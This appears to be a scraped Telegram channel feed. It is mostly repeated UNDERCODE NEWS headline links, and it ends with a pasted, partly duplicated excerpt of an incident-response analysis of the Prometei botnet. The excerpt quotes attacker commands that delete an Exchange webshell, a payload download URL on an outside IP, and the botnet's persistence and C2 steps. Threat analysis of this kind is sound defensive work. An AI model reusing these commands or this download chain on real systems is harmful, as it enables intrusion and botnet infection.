Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
UNDERCODE NEWS
A Year of Gemini: A Pop Quiz - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 A Courageous Leap: Engineer Quits High-Paying Job for Happiness and Impact
https://undercodenews.com/a-courageous-leap-engineer-quits-high-paying-job-for-happiness-and-impact/
@Undercode_News
https://undercodenews.com/a-courageous-leap-engineer-quits-high-paying-job-for-happiness-and-impact/
@Undercode_News
UNDERCODE NEWS
A Courageous Leap: Engineer Quits High-Paying Job for Happiness and Impact - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Italy Gets Its #Digital ID Wallet: Convenience or Privacy Trap?
https://undercodenews.com/italy-gets-its-digital-id-wallet-convenience-or-privacy-trap/
@Undercode_News
https://undercodenews.com/italy-gets-its-digital-id-wallet-convenience-or-privacy-trap/
@Undercode_News
UNDERCODE NEWS
Italy Gets Its Digital ID Wallet: Convenience or Privacy Trap? - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🛡️ #GitHub Enterprise Cloud Earns SOC 2 Type II Compliance, Boosting Security for Developers
https://undercodenews.com/github-enterprise-cloud-earns-soc-2-type-ii-compliance-boosting-security-for-developers/
@Undercode_News
https://undercodenews.com/github-enterprise-cloud-earns-soc-2-type-ii-compliance-boosting-security-for-developers/
@Undercode_News
UNDERCODE NEWS
GitHub Enterprise Cloud Earns SOC 2 Type II Compliance, Boosting Security for Developers - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔍 Empowering the Next Generation of Computing Researchers
https://undercodenews.com/empowering-the-next-generation-of-computing-researchers/
@Undercode_News
https://undercodenews.com/empowering-the-next-generation-of-computing-researchers/
@Undercode_News
UNDERCODE NEWS
Empowering the Next Generation of Computing Researchers - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#Google's #AI Tackles Traffic Congestion and Fuel Emissions
https://undercodenews.com/googles-ai-tackles-traffic-congestion-and-fuel-emissions/
@Undercode_News
https://undercodenews.com/googles-ai-tackles-traffic-congestion-and-fuel-emissions/
@Undercode_News
UNDERCODE NEWS
Google's AI Tackles Traffic Congestion and Fuel Emissions - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔧 A Sleek Solution: Orico's MiniMate for Your M4 Mac mini
https://undercodenews.com/a-sleek-solution-oricos-minimate-for-your-m4-mac-mini/
@Undercode_News
https://undercodenews.com/a-sleek-solution-oricos-minimate-for-your-m4-mac-mini/
@Undercode_News
UNDERCODE NEWS
A Sleek Solution: Orico's MiniMate for Your M4 Mac mini - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 #Apple's M4 Mac Mini: A Powerful Little Package
https://undercodenews.com/apples-m4-mac-mini-a-powerful-little-package/
@Undercode_News
https://undercodenews.com/apples-m4-mac-mini-a-powerful-little-package/
@Undercode_News
UNDERCODE NEWS
Apple's M4 Mac Mini: A Powerful Little Package - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 #Firefox 133: A Leap Forward in Web Browsing
https://undercodenews.com/firefox-133-a-leap-forward-in-web-browsing/
@Undercode_News
https://undercodenews.com/firefox-133-a-leap-forward-in-web-browsing/
@Undercode_News
UNDERCODE NEWS
Firefox 133: A Leap Forward in Web Browsing - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ #GitHub Strengthens Security Posture with New SOC 2 Reports for Enterprise Cloud, #Copilot, and More
https://undercodenews.com/github-strengthens-security-posture-with-new-soc-2-reports-for-enterprise-cloud-copilot-and-more/
@Undercode_News
https://undercodenews.com/github-strengthens-security-posture-with-new-soc-2-reports-for-enterprise-cloud-copilot-and-more/
@Undercode_News
UNDERCODE NEWS
GitHub Strengthens Security Posture with New SOC 2 Reports for Enterprise Cloud, Copilot, and More - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#GitHub Actions: A Deeper Dive into Runner Labels
https://undercodenews.com/github-actions-a-deeper-dive-into-runner-labels/
@Undercode_News
https://undercodenews.com/github-actions-a-deeper-dive-into-runner-labels/
@Undercode_News
UNDERCODE NEWS
GitHub Actions: A Deeper Dive into Runner Labels - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 #Microsoft Expands #Windows Recall #AI Feature: A Measured Approach
https://undercodenews.com/microsoft-expands-windows-recall-ai-feature-a-measured-approach/
@Undercode_News
https://undercodenews.com/microsoft-expands-windows-recall-ai-feature-a-measured-approach/
@Undercode_News
UNDERCODE NEWS
Microsoft Expands Windows Recall AI Feature: A Measured Approach - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
💻 Evernote: A #Digital Notebook for Your Thoughts
https://undercodenews.com/evernote-a-digital-notebook-for-your-thoughts/
@Undercode_News
https://undercodenews.com/evernote-a-digital-notebook-for-your-thoughts/
@Undercode_News
UNDERCODE NEWS
Evernote: A Digital Notebook for Your Thoughts - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Informative The Rise of VK: A Social Media Giant in Russia and Beyond
https://undercodenews.com/informative-the-rise-of-vk-a-social-media-giant-in-russia-and-beyond/
@Undercode_News
https://undercodenews.com/informative-the-rise-of-vk-a-social-media-giant-in-russia-and-beyond/
@Undercode_News
UNDERCODE NEWS
Informative The Rise of VK: A Social Media Giant in Russia and Beyond - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🤖 Informative Navigating Tumblr's Login Process: A Step-by-Step Guide
https://undercodenews.com/informative-navigating-tumblrs-login-process-a-step-by-step-guide/
@Undercode_News
https://undercodenews.com/informative-navigating-tumblrs-login-process-a-step-by-step-guide/
@Undercode_News
UNDERCODE NEWS
Informative Navigating Tumblr's Login Process: A Step-by-Step Guide - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
🦑Exploitation of the Microsoft Exchange Vulnerability:
During the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers exploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code execution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.
The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:
During the IR investigation, the Nocturnus Team was able to identify the initial compromise vector, in which the attackers exploited the recently discovered vulnerabilities in Microsoft Exchange server, which allowed them to perform remote code execution by exploiting the following CVEs: CVE-2021-27065 and CVE-2021-26858.
The attackers used this vulnerability to install and execute the China Chopper webshell via the following commands:
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:
cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\\frontend\httpproxy\owa\auth\<file_name>.aspx"
cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\\frontend\httpproxy\owa\auth\<file_name>.aspx"
Using the webshell, the attackers launched a PowerShell that was then used to download a payload from the following URL:
http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>
The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>
The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
The Prometei Botnet :
When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:
It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.
Sqhost.exe:
Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell
When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:
It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.
Sqhost.exe:
Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell